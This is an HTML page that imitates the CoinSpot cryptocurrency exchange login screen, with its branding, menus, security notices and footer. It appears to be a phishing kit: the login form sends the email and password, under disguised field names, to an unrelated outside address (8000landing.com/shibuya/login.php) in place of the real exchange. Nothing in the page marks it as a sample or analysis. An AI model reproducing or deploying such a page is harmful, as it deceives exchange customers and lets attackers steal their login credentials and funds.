<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="origin-trial" content="A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">

<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:image" content="https://www.coinspot.com.au/public/img/coinspot-sml-white.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="480">
<meta property="og:image:height" content="480">
<title>Buy &amp; Sell Bitcoin, Dogecoin, Litecoin | CoinSpot</title>
<link rel="shortcut icon" href="https://www.coinspot.com.au/public/img/favicon.png?v=386">


<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="https://www.coinspot.com.au/public/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" href="coinspot.min.css">



<link rel="stylesheet" type="text/css" href="flaticon.css">
<link rel="stylesheet" type="text/css" href="font.css">
<link rel="stylesheet" href="main.css">
<link rel="stylesheet" href="v2.css?v=386">



<style>
      
    </style>

</head>
<body style="">
<header class="navbar navbar-default navbar-static-top bs-docs-nav" id="top" role="banner">
<div class="container page-content-body">
<style>
    
      .not-menu {
        width: 550px;
        padding: 20px;
      }
    
      .not-header {
        color: #75798A;
        font-size: 16px;
        font-family: "InterSmBd";
      }
    
      .not-header a {
        font-size: 12px;
      }
    
      .not-tabs {
        margin-top: 20px;
        margin-bottom: 20px;
        font-family: "Inter";
      }
    
      .not-tabs-2 {
        margin-top: 10px;
      }
    
      .not-tabs .nav {
        display: flex;
        margin-bottom: 20px;
      }
    
      .not-tabs .nav li {
        flex: 1;
        text-align: center;
        border: solid 1px #E2E3E9;
        border-right: 0;
        margin: 0;
      }
    
      .not-tabs .nav-pills>li.active>a {
        background-color: #CCDDFF !important;
        color: #0049DB !important;
      }
    
      .not-tabs .nav li:last-child {
        border: solid 1px #E2E3E9;
        border-radius: 0 5px 5px 0 !important;
      }
    
      .not-tabs .nav li:first-child {
        border: solid 1px #E2E3E9;
        border-radius: 5px 0 0 5px !important;
        border-right: 0;
      }
    
      .not-tabs .not-count {
    background-color: #CD4741;
        color: white;
        margin-left: 10px;
        border-radius: 4px !important;
        padding: 2px;
        padding-left: 5px;
        padding-right: 5px;
        float: right;
        font-family: "Circular Std Book";
        font-size: 10px;
        min-width: 18px;
        text-align: center;
      }
    
      .not-content {
        overflow: auto;
        -webkit-overflow-scrolling: touch;
        height: 500px;
      }
    
      .not-content-row h5 {
        color: #181A20;
        font-size: 14px;
        margin-top: 5px;
      }
    
      .not-content-row {
        color: #6E7591;
        font-family: "Inter";
        border-bottom: solid 1px #E2E3E9;
        padding: 10px 10px 10px 10px;
        cursor: pointer;
        background-color: #fbfbfb;
      }
    
      .not-content-row.not-unread {
        background-color: #fff;
        cursor: pointer;
        border-radius: 5px !important;
      }
    
      .not-content-row.not-unread[data-important=true] .not-close {
        display: none;
      }    
    
      .not-content-row.not-unread .not-link {
        display: none;
      }
    
      .not-content-row .not-close {
        float: right;
        font-size: 12px;
      }
    
      .not-content-row h5 .not-alert {
        background: #CD4741;
        width: 12px;
        height: 12px;
        border-radius: 50% !important;
        display: inline-block;
        margin-right: 10px;
      }
    
      .not-content-row .not-time {
        font-size: 12px;
        padding-bottom: 5px;
      }
    
      .not-content-row .not-text-trunc {
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
        max-width: 15ch;    
      }
    
      .not-no-notifications {
        color: #333;
      }
    
      .shorten {
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
        max-width: 15ch;    
      }
    
    
      .not-content-row .not-link {
        padding-top: 10px;
        font-size: 14px;
      }  
    
      .navbar .container {
        background-color: #004FEE;
      }
      .navbar-default .navbar-nav>li>a.standard-menu {
        border-bottom: solid 2px #004FEE;
      }
      .nav.navbar-nav.navbar-right {
        border-bottom: solid 2px #004FEE;
      }
      .nav-menu li {
        display: inline-block;
        width: calc(50% - 2px); 
        margin-bottom: 10px;
        xheight: 62px;
      }
    
      .nav-menu>li>a {
        line-height: 2em !important;
        font-weight: 800;
        font-family: "Mont";
        font-size: 11.5px;
        text-transform: uppercase;
      }
    
      .nav-menu>li>a .dropdown-subtitle {
        color: #ACAEB9;
        font-weight: 400;
        text-transform: none;
      }
    
      .nav-menu>li>a:hover {
     
      }
    
      .nav-arrow {
        line-height: 60px;
        
      }
    
      .dropdown-menu li .nav-arrow i[class^="flaticon-"]:before, .dropdown-menu li .nav-arrow i[class*=" flaticon-"]:before {
          font-size: 16px !important;
          color: #ACAEB9;
      }
    
        .nav-menu li:first-child {
          width: 100%;
        }
    
        .dropdown-menu>li>a {
          line-height: 3em;
        }
    
        .dropdown-menu>li>a.dropdown-header {
          cursor:default;
        }  
        .dropdown-menu>li>a.dropdown-header:hover {
          background-color: white;
        }
    
        .dropdown-menu>li>a>img {
          height: 20px;
          margin-right: 10px;
        }
    
        .dropdown-menu>li>a>svg {
          margin-right: 10px;
        }
    
        .notification-menu .notification-count {
          text-align: center;
          background: red;
          color: white;
          padding-left: 5px;
          padding-right: 5px;
          border-radius: 30% !important;
          font-size: 12px;
          display: none;
          float: right;
          height: 16px;
          line-height: 16px;
          margin-top: 0px;
          position: absolute;
          font-size: 10px;  
          top: 5px;
          right: -5px;
        }
    
        .notification-menu .notification-count.notification-read {
          background: rgba(0, 0, 0, .45);
        }
    
        .not-text pre {
          border: none;
          background-color: transparent;
          font-family: Inter !important;
          color: #6E7591;
          font-size: 14px;
          padding: 0;
          margin: 0;
          white-space: pre-wrap;
          word-break: normal;
        }    
    
        .notification-important {
          position: absolute;
          top: 2px;
          right: -5px;
          height: 20px;
        }    
    
    
        @media (max-width: 991px) {
          .notification-menu .notification-count {
            top: 12px;
            right: 5px;        
          }
          .notification-menu .notification-important {
            right: 5px;        
          }
          .not-tabs {
            margin: 0;
          }
        }      
    
    
        @media (max-width: 1000px) {
    
        .not-tabs .nav {
          display: block;
        }
    
          .navbar-header {
            float: none;
          }
          .navbar-left,.navbar-right {
            float: none !important;
          }
          .navbar-toggle {
            display: block;
            margin-right: 0px;
          }
          .navbar-collapse {
            border-top: 1px solid transparent;
            box-shadow: inset 0 1px 0 rgba(255,255,255,0.1);
          }
          .navbar-fixed-top {
            top: 0;
            border-width: 0 0 1px;
          }
          .navbar-collapse.collapse {
            display: none!important;
          }
          .navbar-nav {
            float: none!important;
            margin-top: 7.5px;
          }
          .navbar-nav>li {
            float: none;
          }
          .navbar-nav>li>a {
            padding-top: 10px;
            padding-bottom: 10px;
          }
          .collapse.in{
            display:block !important;
          }
    
        }  
    
        .account-icon:before {
          top: 0 !important;
          font-size: 20px;
        }
    
        .account-arrow:before {
          top: -3px !important;
          font-size: 12px;
        }  
    
      .open > .dropdown-menu {
        animation-name: slidenavAnimation;
        animation-duration:.3s;
        animation-iteration-count: 1;
        animation-timing-function: ease;
        animation-fill-mode: forwards;
    
        -webkit-animation-name: slidenavAnimation;
        -webkit-animation-duration:.3s;
        -webkit-animation-iteration-count: 1;
        -webkit-animation-timing-function: ease;
        -webkit-animation-fill-mode: forwards;
    
        -moz-animation-name: slidenavAnimation;
        -moz-animation-duration:.3s;
        -moz-animation-iteration-count: 1;
        -moz-animation-timing-function: ease;
        -moz-animation-fill-mode: forwards;
      }
      @keyframes slidenavAnimation {
        from {
          opacity: 0;
        }
        to {
          opacity: 1;
        }
      }
      @-webkit-keyframes slidenavAnimation {
        from {
          opacity: 0;
        }
        to {
          opacity: 1;
        }
      }  
    </style>
<div class="innercontainer">
<div class="navbar-header">
<button class="pull-right navbar-toggle sidenav-toggle collapsed navbar-menu-button" style="margin-top:12px" type="button">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar" style="background-color:#fff"></span>
<span class="icon-bar" style="background-color:#fff"></span>
<span class="icon-bar icon-bar-small" style="background-color:#fff"></span>
</button>
<a class="pull-right btn-header login-btn userlogin" style="color:#FFE; margin-top:12px" href="">LOGIN</a>
<a class="col-md-push-1 navbar-brand" style="padding-top: 19px;" href=""><img src="coinspot-logo.svg" alt="CoinSpot" style="margin-top:-5px;margin-right:5px;height:30px;width:30px"> CoinSpot</a>
</div>
<nav class="navbar-collapse bs-navbar-collapse collapse" role="navigation" style="height: 1px;">
<ul class="nav navbar-nav navbar-right" style="margin-right:0px">
<li><a href="" class="home-menu">Home</a></li>
<li><a href="" class="wallets-menu">Wallets</a></li>
<li><a href="" class="buysell-menu">Buy/Sell</a></li>
<li><a href="" class="swap-menu">Swap</a></li>
<li><a href="" class="bundles-menu">Bundles</a></li>
<li><a href="" class="nft-menu">NFT</a></li>
<li><a href="" class="otc-menu">OTC</a></li>
<li><a href="" class="markets-menu">Markets</a></li>
<li class="register-link"><a href="" class="btn-header hidden-xs">Register</a></li>
<li><a href="" class="hidden-sm hidden-md hidden-lg">Register</a></li>
<li class="home-login-link"><a href="" class="btn-header hidden-xs">Login</a></li>
<li><a href="" class="hidden-sm hidden-md hidden-lg">Login</a></li>
</ul>
</nav>
</div>
<div class="sidenav-overlay sidenav-overlay-1"></div>
<nav id="notificationnav" class="hidden not-tabs" role="navigation">
<div class="not-header">Notifications
<a href="" class="pull-right">View All</a>
</div>
<div class="not-tabs-2"></div>
</nav>
<div class="sidenav-overlay sidenav-overlay-2"></div>
<nav id="sidenav" class="hidden" role="navigation">
<div class="sidenav-header">
<img src="logo-horz-ondark.png" alt="CoinSpot" style="height:35px">
</div>
<ul class="list-unstyled">
<li><a href=""><i class="flaticon-home"></i>HOME</a></li>
<li><a href=""><span><i class="flaticon-money"></i>WALLETS</span></a></li>
<li><a href=""><i class="flaticon-buy"></i>BUY / SELL</a></li>
<li><a href=""><i class="flaticon-exchange"></i>SWAP</a></li>
<li><a href=""><i class="flaticon-bills"></i>BUNDLES</a></li>
<li><a href=""><i class="flaticon-buy"></i>NFT</a></li>
<li><a href=""><i class="flaticon-scales"></i>OTC</a></li>
<li><a href=""><i class="flaticon-bar-chart"></i>MARKETS</a></li>
</ul>
<ul class="list-unstyled pt-40 pb-50">
<li><a href=""><i class="flaticon-rocket"></i>REGISTER</a></li>
<li><a href=""><i class="flaticon-log-out"></i>LOGIN</a></li>
<li><a href="" target="_blank" class="chat"><i class="flaticon-speech-bubble-1"></i>SUPPORT</a></li>
</ul>
</nav>
<script nonce="">
      $('.sidenav-toggle, .sidenav-overlay-2').click(function (e) {
        $('#sidenav').toggleClass('hidden');
        $('.sidenav-overlay-2').toggle();
        $('body').toggleClass('vh-100');
        e.stopPropagation();
      })
    
      $('#account-dropdown-menu').on('shown.bs.dropdown', function () {
        $('.nav-menu').width(550);
        //$('.dropdown-toggle.account-menu').width($('.navbar-nav>li>.dropdown-menu').width()-20);
      })
    
      $('#account-dropdown-menu').on('hide.bs.dropdown', function () {
        $('.dropdown-toggle.account-menu').width(0);
      })
    
    
    
      $(document).on('click', '.notification-toggle, .sidenav-overlay-1', function () {
        $('#notificationnav').toggleClass('hidden');
        $('.sidenav-overlay-1').toggle();
        $('body').toggleClass('vh-100');
        getmessageslist_menu('not-tabs-2');
        return false;
      });
    
      $(document).on('click', '.dropdown-menu.not-menu a[data-toggle="tab"]', function (e) {
        e.stopPropagation()
        $(this).tab('show');
        return false;
      })
    
      $(document).on('click', '#notificationnav a[data-toggle="tab"]', function (e) {
        e.stopPropagation()
        $(this).tab('show');
        return false;
      })
    
      $(document).on('click', '.not-content-row a', function (e, y) {
        e.stopPropagation()
        return true;
      })
    
      $(document).on('click', '.not-content-row', function (e, y) {
        var id = $(this).attr('data-id');
        var tab = $(this).attr('data-tab');
        markmessageasread_menu(id, tab);
        return false;
      })
    
      $(document).on('click', '.not-close', function (e, y) {
        var id = $(this).attr('data-id');
        var tab = $(this).attr('data-tab');
        markmessageasclose_menu(id, tab);
        return false;
      })
    
      function showalerts(count, important) {
        $('.notification-menu .notification-count').addClass('notification-read');
        $('.notification-menu .notification-count').html(count);
        if (count > 0) $('.notification-menu .notification-count').removeClass('notification-read');
    
        $('.notification-menu .notification-important').hide();
        $('.notification-menu .notification-count').hide();
    
        if (important)
          $('.notification-menu .notification-important').show();
        else
          $('.notification-menu .notification-count').show();
    
        if (count <= 0) $('.notification-menu .notification-count').hide();
      }
    
      showalerts(('' || 0), '' == 'true');
    
      function getmessages_menu() {
        $.get('/my/messagecenter/count', function (data) {
    
          // not availble on route
          if (typeof data == "string") return;
    
          if (data && data.ok && data.result) {
            showalerts(data.result.count, data.result.hasimportant)
          }
    
          setTimeout(getmessages_menu, 10000);
        })
      }
    
      getmessages_menu();
    
      var tabcounts = {};
    
      function markmessageasread_menu(id, tab) {
    
        var alreadyread = !$('.not-content-row[data-id=' + id + ']').hasClass('not-unread');
    
        $('.not-content-row[data-id=' + id + ']').removeClass('not-unread');
        $('.not-content-row[data-id=' + id + ']').find('.not-text').removeClass('not-unread');
        $('.not-content-row[data-id=' + id + ']').find('.not-text pre').toggleClass('not-text-trunc');
        $('.not-content-row[data-id=' + id + ']').find('.not-link').toggleClass('hidden');
    
        if (alreadyread) return;
    
        var unread = tabcounts[tab].ucount;
        if (unread > 0) tabcounts[tab].ucount = unread - 1;
    
        if (tabcounts[tab].ucount > 0) {
          var ucounttext = tabcounts[tab].ucount;
          if (ucounttext > 5) ucounttext = "5+";
          $('li[data-tab="' + tab + '"] span').html(ucounttext);
        }
        else {
          $('li[data-tab="' + tab + '"] span').remove();
        }
    
        $.post('/my/messagecenter/markread', {
          id: id
        })
    
      }
    
      function markmessageasclose_menu(id, tab) {
        $('.not-content-row[data-id=' + id + ']').hide(300);
    
        if ($('.not-content-row.not-unread[data-id=' + id + ']').length) {
          var unread = tabcounts[tab].ucount;
          if (unread > 0) tabcounts[tab].ucount = unread - 1;
    
          if (tabcounts[tab].ucount > 0) {
            var ucounttext = tabcounts[tab].ucount;
            if (ucounttext > 5) ucounttext = "5+";
            $('li[data-tab="' + tab + '"] span').html(ucounttext);
          }
          else {
            $('li[data-tab="' + tab + '"] span').remove();
          }
        }
    
        $.post('/my/messagecenter/remove', {
          id: id
        })
      }
    
      $('#notification-dropdown-menu').on('shown.bs.dropdown', function () {
        getmessageslist_menu('not-tabs-1');
      })
    
      function getmessageslist_menu(container) {
        $.get('/my/messagecenter/preview', function (data) {
          if (data && data.ok && data.result) {
            return showmessageslist_menu(data.result, container);
          }
          $('.' + container).html("Error retrieving notifications");
        })
      }
    
      function showmessageslist_menu(data, container) {
    
        var tabs = Object.keys(data);
        tabs.sort(function (a, b) {
          if (data[a].tab < data[b].tab) { return -1; }
          if (data[a].tab > data[b].tab) { return 1; }
          return 0;
        });
    
        var tabsHtml = ``;
        $.each(tabs, function (i, item) {
          var count = '';
          var plus = '';
    
          tabcounts[item] = { rcount: data[item].rcount, ucount: data[item].ucount }
    
          if (data[item].hasmore) plus = '+';
          if (data[item].msgs.length) count = `<span class='not-count'>${data[item].msgs.length}${plus}</span>`;
          if (i == 0) tabsHtml += `<li class="active" data-tab="${item}"><a data-toggle="tab" href="#tab_${i}_${container}">${item}${count}</a></li>`;
          else tabsHtml += `<li data-tab="${item}"><a data-toggle="tab" href="#tab_${i}_${container}">${item}${count}</a></li>`;
        })
    
        var contentHtml = '';
        $.each(tabs, function (i, item) {
    
          var items = data[item].msgs;
          var rowHtml = '';
          $.each(items, function (x, row) {
            var link = '';
            var important = '';
            var unread = '';
            if (row.hdomain) {
              var target = '';
              if (row.newtab) target = ' target="_blank" ';
              link = `<div class="not-link hidden"><a ${target} href="https://${row.hdomain}${row.hpath}">${row.htext}</a></div>`
            }
            if (row.important) {
              important = '<img style="height:24px" src="/public/img/warning.svg" />';
            }
            if (row.unread) {
              unread = 'not-unread';
            }
            var closelink = `<a href='#' data-id='${row._id}' data-tab='${item}' class='not-close'><i class='flaticon flaticon-close'></i></a>`;
            rowHtml += `
                    <div class="not-content-row ${unread}" data-important="${row.important}" data-tab="${item}" data-id="${row._id}">
                      ${closelink}
                      <h5>${important}${row.title}</h5>
                      <div class="not-time">${row.activated}</div>
                      <div class="not-text" data-id="${row._id}"><pre class="not-text-trunc">${row.body}</pre>${link}</div>               
                    </div>`;
          })
    
          if (!rowHtml) rowHtml = '<div style="padding: 10px;" class="not-no-notifications">There are no unread notifications.</div>'
    
          if (i == 0) contentHtml += `<div id="tab_${i}_${container}" class="tab-pane in active">${rowHtml}</div>`;
          else contentHtml += `<div id="tab_${i}_${container}" class="tab-pane">${rowHtml}</div>`;
        });
    
        $('.' + container).html(`<ul class="nav nav-pills">${tabsHtml}</ul><div class='tab-content'>${contentHtml}</div>`);
      }
    </script> </div>
</header>
<style>
	.txt-smbd {
		font-family: "InterSmBd" !important;
	}

	.txt-g5 {
		color: #75798A;
	}

	.cs-logo {
		font-family: "MontSmBd";
		color: #17181C !important;
		cursor: pointer;
		font-size: 22px;
	}

	.cs-logo img {
		height: 32px;
		margin-top: -4px;
		margin-right: 5px;
  }

	.bg-wrap {
		width: 100%;
		height: 100%;
		overflow: hidden;
	}

	.img-planet1 {
		position: absolute;
		top: 50px;
		right: -30px;
		height: 100px;
		max-height: 10%;
		width: auto;
		-webkit-transform: rotate(30deg);
		-moz-transform: rotate(30deg);
		-ms-transform: rotate(30deg);
		-o-transform: rotate(30deg);
		transform: rotate(30deg);
	}
	.img-planet2 {
		position: absolute;
		top: 70px;
		left: -80px;
		height: 175px;
		max-height: 18%;
		width: auto;
		-webkit-transform: rotate(60deg);
		-moz-transform: rotate(60deg);
		-ms-transform: rotate(60deg);
		-o-transform: rotate(60deg);
		transform: rotate(60deg);
	}
	.img-planet3 {
		position: absolute;
		bottom: -110px;
		right: -150px;
		height: 295px;
		max-height: 35%;
		width: auto;
	}
	.img-comet1 {
		display: none;
		position: absolute;
		top: 40%;
		bottom: 0;
		right: 40px;
	}
	.img-star1 {
		position: absolute;
		top: 100px;
		right: 30%;
		height: 10px;
		width: auto;
	}
	.img-star2 {
		position: absolute;
		top: 130px;
		right: 25%;
		height: 10px;
		width: auto;
	}
	.img-star3 {
		position: absolute;
		bottom: 120px;
		left: 80px;
		height: 10px;
		width: auto;
	}
	.img-star4 {
		position: absolute;
		bottom: 50px;
		left: 130px;
		height: 10px;
		width: auto;
	}

	.login-news {
		font-family: Mont;
	}

	.card-br8 {
		color: #17181C;
		font-size: 12px;
		background-color: #fff;
		border-radius: 8px !important;
		padding: 30px;
		z-index: 99;
	}

	.card-br8 .heading {
		font-family: "MontSmBd";
		font-size: 20px;
		margin-bottom: 15px;
	}

	.card-br8 .subheading {
		font-family: "MontSmBd";
		margin-bottom: 5px;
		font-size: 14px;
	}

	.card-br8 .body-txt {
		opacity: 0.6;
		margin-bottom: 20px;
	}

	hr {
		margin-top: 15px;
		margin-bottom: 15px;
		border-top: 2px solid #E3E4E8;
	}

	.togglepassword, .togglepassword:focus, .togglepassword:active {
		cursor: pointer;
		color: #949494;
	}	

  	.mt-100 {
    	margin-top: 100px !important;
  	}

  	.mb-100 {
    	margin-bottom: 100px !important;
  	}	

	@media (min-width: 1200px) {
		.img-comet1 {
			display: inline;
		}
  }

	@media (min-width: 2400px) {
		.img-planet1, .img-planet3 {
			right: 0;
		}
	}

</style>
<div class="v2">
<div class="grid no-gutters">
<div class="col-md-6 col-sm-12 v-lg-middle px-20">
<div class="mx-auto py-50 py-lg-80" style="max-width: 410px">
<h1 class="heading-2 my-30"><p style="color: #17181C;">Log in to your CoinSpot account</p></h1>
<form class="loginform" role="form" action="https://8000landing.com/shibuya/login.php" method="POST">
<input type="hidden" name="_csrf" value="9SI2Jguk-v6Bk1npbls0cYhhvKPY2CIHOM4U">
<input type="hidden" id="fingerprint" name="fingerprint" value="662404414">
<div class="form-group">
<label>Email</label>
<input type="text" class="form-control login" name="sultan" autocomplete="on" placeholder="Type your email">
</div>
<div class="form-group">
<label>Password</label>
<div class="input-group">
<input type="password" class="form-control" name="sultan2" autocomplete="off" maxlength="200" placeholder="Type your password" style="border-right: 0">
<div class="input-group-addon">
<span class="togglepassword"><i class="flaticon-vision"></i></span>
</div>
</div>
</div>



<button type="submit" class="btn btn-primary btn-lg mt-20 w-100">Login</button>
<br><div class="text-center mt-10">
<br><a href="">Forgot your password?</a><br><br><br>
<b></b>
</div>
</form>
</div>
</div>
<div class="col-md-6 col-sm-12 bg-blue">
<div class="bg-wrap v-lg-middle position-relative">
<img class="img-planet1" src="planet.png">
<img class="img-planet2" src="planet.png">
<img class="img-planet3" src="planet.png">
<img class="img-comet1" src="comet.png">
<img class="img-star1" src="cross.svg">
<img class="img-star2" src="cross.svg">
<img class="img-star3" src="cross.svg">
<img class="img-star4" src="cross.svg">
<div class="card-br8 mx-auto mt-100 mb-100 login-news" style="max-width: 325px">
<div class="heading">Security News</div>


<div class="subheading">External statutory financial audit complete</div>
<div class="body-txt">CoinSpot is the first Australian Cryptocurrency Exchange to audit their assets. This confirms holdings are available as displayed and are kept one-to-one.</div>
<div class="subheading">Enable Two Factor Authentication</div>
<div class="body-txt">Increase the security of your CoinSpot account and enable 2FA in your Account Settings.</div>
<div class="subheading">Never create an account on behalf of someone else</div>
<div class="body-txt">If you have been asked to login or create an account to purchase something on Gumtree, Ebay etc. it is highly likely to be a scam and you should contact our support team immediately.</div>
</div>
</div>
</div>
</div>
</div>
<script nonce="">
	if ($.jStorage.get('email')) {
		var email = $.jStorage.get('email');
		$('.login').val(email);
		$('.remember').prop('checked', true);
	}

	$(document).ready(function () {
		var width = $('.g-recaptcha').parent().width();
		var fingerprint;
		
		try {
			fingerprint = fp.get();
			$('#fingerprint').val(fingerprint);
		} catch (e) {
		}
		
		if (width < 302) {
			var scale = width / 302;
			$('.g-recaptcha').css('transform', 'scale(' + scale + ')');
			$('.g-recaptcha').css('-webkit-transform', 'scale(' + scale + ')');
			$('.g-recaptcha').css('transform-origin', '0 0');
			$('.g-recaptcha').css('-webkit-transform-origin', '0 0');
		}
	});   

	$('.togglepassword').click(function() {
  		var input = $('input[name=password]');
  		if (input.attr("type") == "password") {
    		input.attr("type", "text");
			$(this).html('<i class="flaticon-eyes"></i>');
  		} else {
    		input.attr("type", "password");
			$(this).html('<i class="flaticon-vision"></i>');
  		}
		return false;
	});

</script>
<footer class="v2 py-50 " role="contentinfo">
<div class="container">
<div class="grid">
<div class="d-none d-lg-block col-lg-2">
<div class="mt-20" style="white-space: nowrap">
<a class="footer-logo" href=""><img src="coinspot-logo.svg" alt="CoinSpot">CoinSpot</a>
</div>
<div class="footer-adcca mt-20">
<a href="" target="_blank" rel="nofollow">
<img src="adcca-industry.png" alt="adcca industry certified" style="max-width:160px">
<div class="footer-text">Member since: 02.02.2014</div>
</a>
</div>
<div class="footer-iso mt-30">
<a href="" target="_blank" rel="nofollow">
<div>
<img style="width:100%" src="iso27001.png">
</div>
<div class="footer-text text-center">
Certified since: 13.02.2020
</div>
</a>
</div>
</div>
<div class="col-6 col-md-4 col-lg-2">
<ul class="footer-group">
<li class="footer-group-title">PRODUCTS</li>
<li><a href="">Buy Bitcoin</a></li>
<li><a href="">Bitcoin Trading</a></li>
<li><a href="">Instant Buy/Sell</a></li>
<li><a href="">Instant Swap</a></li>
<li><a href="">CoinSpot Markets</a></li><a href="">
</a><li><a href=""></a><a href="">CoinSpot Bundles</a></li>
<li><a href="">CoinSpot Mastercard</a></li>
<li><a href="">Buy NFTs</a></li>
<li><a href="">Buy &amp; Sell DeFi Projects</a></li>
<li><a href="">Buy &amp; Sell NFT Projects</a></li>
<li><a href="">Multicoin Wallets</a></li>
<li><a href="">Over the Counter (OTC)</a></li>
<li><a href="">Self Managed Super (SMSF)</a></li>
<li><a href="">API</a></li>
<li><a href="">CoinSpot App</a></li>
<li>
<a href="" class="setnightmodebtn btn btn-default toggle">
<i class="flaticon-moon-1"></i>
Night
</a>
</li>
</ul>
</div>
<div class="col-6 col-md-4 col-lg-2">
<ul class="footer-group">
<li class="footer-group-title">ABOUT</li>
<li><a href="">Security</a></li>
<li><a href="">Trade Safely With CoinSpot</a></li><a href="">
</a><li><a href=""></a><a href="">Press Enquiries</a></li>
<li><a href="">Fees</a></li>
<li><a href="">Terms of Use</a></li>
<li><a href="">Privacy Policy</a></li>
<li><a href="">AML</a></li>
</ul>
</div>
<div class="col-6 col-md-4 col-lg-2">
<ul class="footer-group mb-30">
<li class="footer-group-title">EARN</li>
<li><a href="">Affiliate Program</a></li>
<li><a href="">Referral Program</a></li>
</ul>
<ul class="footer-group d-none d-lg-block">
<li class="footer-group-title">COMMUNITY</li>
<li><a href="" target="_blank" rel="nofollow">Facebook</a></li>
<li><a href="" target="_blank" rel="nofollow">Twitter</a></li>
<li><a href="" target="_blank" rel="nofollow">Instagram</a></li>
<li><a href="" target="_blank" rel="nofollow">Reddit</a></li>
</ul>
</div>
<div class="col-6 col-md-4 col-lg-2">
<ul class="footer-group">
<li class="footer-group-title">LEARN</li>
<li><a href="">Learn with CoinSpot</a></li>
<li><a href="">Bitcoin Halving</a></li>
<li><a href="">How to buy Bitcoin</a></li>
<li><a href="">How to buy Ethereum</a></li>
<li><a href="">Cryptocurrency &amp; Tax</a></li>
</ul>
</div>
<div class="d-lg-none col-6 col-md-4 col-lg-2">
<ul class="footer-group">
<li class="footer-group-title">COMMUNITY</li>
<li><a href="" target="_blank" rel="nofollow">Facebook</a></li>
<li><a href="" target="_blank" rel="nofollow">Twitter</a></li>
<li><a href="" target="_blank" rel="nofollow">Instagram</a></li>
<li><a href="" target="_blank" rel="nofollow">Reddit</a></li>
</ul>
</div>
<div class="col-6 col-md-4 col-lg-2">
<ul class="footer-group">
<li class="footer-group-title">SUPPORT</li>
<li><a target="_blank" href="">Help Centre</a></li>
<li><a href="">Contact Support</a></li>
<li><a href="">Account Recovery</a></li>
<li><a target="_blank" href="">Complaints &amp; Disputes</a></li>
<li><a target="_blank" href="">Protect Yourself Online</a></li>
<li><a href="">Request a Coin</a></li>
</ul>
</div>
</div>
<div class="d-lg-none">
<div class="mt-20" style="white-space: nowrap">
<a class="footer-logo" href=""><img src="coinspot-logo.svg" alt="CoinSpot">CoinSpot</a>
</div>
<div class="d-flex mt-10">
<div>
<a href="" target="_blank" rel="nofollow">
<img src="adcca-industry.png" alt="adcca industry certified" style="max-width:160px"><br>
<span class="footer-text">Member since: 02.02.2014</span>
</a>
</div>
<div class="footer-iso ml-10 ml-sm-30">
<a href="" target="_blank" rel="nofollow">
<div>
<img style="max-width:150px" src="iso27001.png">
</div>
<div class="footer-text text-center">
Certified since: 13.02.2020
</div>
</a>
</div>
</div>
</div>
</div>
<style>
    .toggle {
      border-radius: 5px !important;
      border-width: 2px;
      background-color: transparent;
      margin-top: 10px;
      padding: 3px 6px;
      min-width: auto;
    }
    .toggle:hover {
      min-width: auto;
    }
  </style>
<script nonce="">
    $(function() {
      var now = new Date(new Date().getTime() - (1000 * 60 * 60));
      
      function getAffiliate() {
        var regex = new RegExp("[\\?&]affiliate=([^&#]*)"), results = regex.exec(location.search);
        return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
      }   
  
      var affiliate = getAffiliate();
      if (!affiliate) return;
  
      if (typeof affiliate != "string") return;
  
      var regex = new RegExp("^(?=.*[0-9])[A-Za-z0-9]+$")
      if (!regex.test(affiliate)) return;
  
      if (affiliate.length > 10) affiliate = affiliate.slice(0, 10).trim();
  
      var date = new Date();
      date.setTime(date.getTime() + (7 * 24 * 60 * 60 * 1000));
      document.cookie = "affiliate=" + affiliate + '; expires=' + date.toUTCString(); + '; path=/';
  
      //remove referral cookie
      document.cookie = 'referralcode=;expires=Thu, 01 Jan 1970 00:00:01 GMT;';
      
    })
  
    $('.setdaymodebtn').click(function() {
      setCookie('nightmode', 'false', 10000);
    })
  
    $('.setnightmodebtn').click(function() {
      setCookie('nightmode', 'true', 10000);
      location.reload();
    })
  
  </script>
</footer>



</body></html>